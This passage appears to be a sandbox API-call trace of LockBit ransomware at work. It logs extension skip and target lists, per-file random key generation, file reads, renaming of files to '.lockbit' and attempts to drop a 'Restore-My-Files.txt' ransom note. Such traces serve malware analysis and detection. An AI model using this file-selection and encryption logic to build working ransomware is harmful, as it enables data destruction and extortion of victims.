lpString2=".BMP") returned 1 [0132.210] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0132.210] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0132.210] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0132.210] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0132.210] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0132.210] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0132.210] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0132.210] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0132.210] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0132.210] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0132.210] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0132.210] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0132.211] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0132.211] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0132.211] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0132.211] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0132.211] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0132.211] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0132.211] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0132.211] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0132.211] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0132.211] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0132.211] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0132.211] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0132.211] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0132.211] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0132.211] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0132.211] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0101863.BMP") returned 1 [0132.211] lstrcmpiW (lpString1="ntldr", lpString2="J0101863.BMP") returned 1 [0132.211] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0101863.BMP") returned 1 [0132.211] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0101863.BMP") returned -1 [0132.211] lstrcmpiW (lpString1="autorun.inf", lpString2="J0101863.BMP") returned -1 [0132.211] lstrcmpiW (lpString1="thumbs.db", lpString2="J0101863.BMP") returned 1 [0132.211] lstrcmpiW (lpString1="iconcache.db", lpString2="J0101863.BMP") returned -1 [0132.211] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0132.211] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP") returned=".BMP" [0132.211] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0132.211] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0132.211] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0132.212] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0132.212] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0132.212] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0132.212] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0132.212] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0132.212] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0132.212] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0132.212] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0132.212] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0132.212] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0132.212] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0132.212] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0132.212] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0132.212] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0132.212] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0132.212] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0132.212] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0132.212] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0132.212] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0132.212] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0132.212] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0132.212] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0132.212] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0132.212] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0132.212] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0132.212] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP.lockbit") returned 72 [0132.212] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101863.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0132.213] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0132.213] malloc (_Size=0x40068) returned 0x3df0008 [0132.214] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=32184) returned 1 [0132.214] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0132.214] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0132.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0132.214] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0132.215] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0132.215] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0132.215] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0134.490] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0134.491] malloc (_Size=0xa6) returned 0x77d7a8 [0134.491] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0135.841] free (_Block=0x77d7a8) [0135.842] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0135.842] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0135.842] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0135.842] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc447bc00, ftCreationTime.dwHighDateTime=0x1bd732d, ftLastAccessTime.dwLowDateTime=0x65df6970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc447bc00, ftLastWriteTime.dwHighDateTime=0x1bd732d, nFileSizeHigh=0x0, nFileSizeLow=0x7ce0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0101864.BMP", cAlternateFileName="")) returned 1 [0135.842] lstrcmpiW (lpString1=".", lpString2="J0101864.BMP") returned -1 [0135.842] lstrcmpiW (lpString1="..", lpString2="J0101864.BMP") returned -1 [0135.842] PathFindExtensionW (pszPath="J0101864.BMP") returned=".BMP" [0135.842] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0135.842] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0135.842] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0135.842] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0135.842] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0135.842] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0135.842] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0135.842] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0135.842] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0135.843] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0135.843] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0135.843] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0135.843] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0135.843] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0135.843] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0135.843] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0135.843] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0135.843] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0135.843] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0135.843] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0135.843] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0135.843] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0135.843] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0135.843] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0135.843] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0135.843] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0135.843] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0135.843] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0135.843] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0135.843] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0135.843] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0135.843] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0135.843] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0135.843] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0135.843] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0135.843] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0135.844] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0135.844] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0135.844] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0135.844] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0135.844] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0135.844] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0135.844] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0135.844] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0135.844] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0135.844] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0135.844] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0135.844] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0101864.BMP") returned 1 [0135.844] lstrcmpiW (lpString1="ntldr", lpString2="J0101864.BMP") returned 1 [0135.844] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0101864.BMP") returned 1 [0135.844] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0101864.BMP") returned -1 [0135.844] lstrcmpiW (lpString1="autorun.inf", lpString2="J0101864.BMP") returned -1 [0135.844] lstrcmpiW (lpString1="thumbs.db", lpString2="J0101864.BMP") returned 1 [0135.844] lstrcmpiW (lpString1="iconcache.db", lpString2="J0101864.BMP") returned -1 [0135.845] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0135.845] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101864.BMP") returned=".BMP" [0135.845] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0135.845] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0135.845] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0135.845] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0135.845] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0135.845] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0135.845] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0135.845] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0135.845] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0135.845] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0135.845] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0135.845] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0135.845] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0135.845] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0135.845] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0135.845] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0135.845] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0135.845] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0135.845] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0135.845] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0135.845] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0135.845] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0135.845] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0135.846] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0135.846] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0135.846] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0135.846] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0135.846] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0135.846] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101864.BMP.lockbit") returned 72 [0135.846] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101864.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101864.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0135.847] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0135.847] malloc (_Size=0x40068) returned 0x3df0008 [0135.847] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=31968) returned 1 [0135.847] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0135.847] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0135.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0135.847] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0135.848] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0135.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0135.848] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0135.894] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101864.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101864.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0135.894] malloc (_Size=0xa6) returned 0x77d7a8 [0135.894] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0135.943] free (_Block=0x77d7a8) [0135.943] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101864.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0135.943] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0135.943] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0135.943] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb98d2700, ftCreationTime.dwHighDateTime=0x1bd732d, ftLastAccessTime.dwLowDateTime=0x65e1cad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb98d2700, ftLastWriteTime.dwHighDateTime=0x1bd732d, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0101865.BMP", cAlternateFileName="")) returned 1 [0135.943] lstrcmpiW (lpString1=".", lpString2="J0101865.BMP") returned -1 [0135.943] lstrcmpiW (lpString1="..", lpString2="J0101865.BMP") returned -1 [0135.943] PathFindExtensionW (pszPath="J0101865.BMP") returned=".BMP" [0135.943] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0135.943] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0135.943] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0135.943] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0135.943] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0135.943] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0135.944] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0135.944] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0135.944] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0135.944] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0135.944] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0135.944] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0135.944] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0135.944] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0135.944] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0135.944] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0135.944] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0135.944] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0135.944] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0135.944] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0135.944] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0135.944] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0135.944] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0135.944] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0135.944] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0135.944] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0135.944] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0135.944] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0135.945] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0135.945] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0135.945] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0135.945] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0135.945] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0135.945] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0135.945] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0135.945] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0135.945] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0135.945] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0135.945] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0135.945] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0135.945] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0135.945] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0135.945] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0135.945] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0135.945] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0135.945] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0135.945] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0135.945] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0101865.BMP") returned 1 [0135.945] lstrcmpiW (lpString1="ntldr", lpString2="J0101865.BMP") returned 1 [0135.945] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0101865.BMP") returned 1 [0135.945] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0101865.BMP") returned -1 [0135.945] lstrcmpiW (lpString1="autorun.inf", lpString2="J0101865.BMP") returned -1 [0135.945] lstrcmpiW (lpString1="thumbs.db", lpString2="J0101865.BMP") returned 1 [0135.945] lstrcmpiW (lpString1="iconcache.db", lpString2="J0101865.BMP") returned -1 [0135.945] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0135.946] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101865.BMP") returned=".BMP" [0135.946] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0135.946] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0135.946] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0135.946] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0135.946] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0135.946] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0135.946] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0135.946] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0135.946] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0135.946] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0135.946] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0135.946] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0135.946] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0135.946] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0135.946] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0135.946] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0135.946] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0135.946] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0135.946] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0135.946] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0135.947] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0135.947] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0135.947] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0135.947] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0135.947] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0135.947] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0135.947] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0135.947] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0135.947] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101865.BMP.lockbit") returned 72 [0135.947] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101865.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101865.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0135.948] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0135.948] malloc (_Size=0x40068) returned 0x3df0008 [0135.948] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=32184) returned 1 [0135.948] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0135.948] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0135.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0135.949] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0135.949] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0135.949] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0135.949] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, 